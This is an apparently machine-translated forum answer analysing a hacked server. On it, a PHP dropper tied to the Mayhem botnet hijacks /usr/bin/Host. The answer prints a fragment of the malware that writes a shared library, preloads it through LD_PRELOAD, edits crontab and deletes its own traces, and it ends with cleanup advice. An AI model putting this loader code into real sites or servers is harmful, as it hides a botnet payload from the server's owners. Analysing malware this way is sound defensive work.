/ usr / bin / HostがハッキングされたPHPスクリプト

気分を害したPHPスクリプトとグーグル（ このスレッド ）のソースコードを掘り下げた後、私は説明を見つけました。

これは私が見つけたsystem.phpコードの一部です：

<?php
// ...
$n = file_put_contents("./libworker.so", $so);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/Host");
$SCP=getcwd();
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/Host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
// ...

/usr/bin/Hostがどのように関与しているかは、もう少し高度です。プログラムは、一部の機能にライブラリ（.soファイル）を使用します。ユーザーは、正当なバイナリを起動する前に、いくつかの.soファイルをプレリンク（LD_PRELOAD）して、動作を変更できます。

ご覧のとおり、このスクリプトはファイルlibworker.soを作成し、LD_PRELOAD環境変数を使用してそれをプリロードしているため、正当なHostバイナリはまったく異なる処理を行っています。

1.shシェルスクリプトを作成し、いくつかの方法で（直接、atコマンドを使用して、cronを使用して）実行しようとします。その後すぐに、スクリプトとライブラリファイルがディスクから削除されるため、通知されなくなります。

そもそも何が起こったかというと、脆弱なWordpressプラグインが悪用され、攻撃者がファイルをWordの書き込み可能なディレクトリに置くことができました。

緩和策とは、そのドメインの古いアクセスログファイルを分析し、異常な場所へのPOSTリクエストを見つけようとすることです。たとえば、WP/JoomlaプラグインのPHPファイルに直接アクセスすることは異常です。その後、削除してください。難読化されたすべてのPHP=ファイル、ディレクトリのアクセス許可を修正、実行中のHostプロセスを終了、ログファイルを再ハッキングの試みがないか監視します。

編集：私はESETから、この特定のライブラリと他のバージョンをすでに検出しているという情報を得ました。アンチウイルス会社はそれに名前Roopreを付け、それはMayhemボットネットの一部として使用されているようです。

Mayhemボットネットの詳細 analysis 。

詳細 analysis このエクスプロイトの。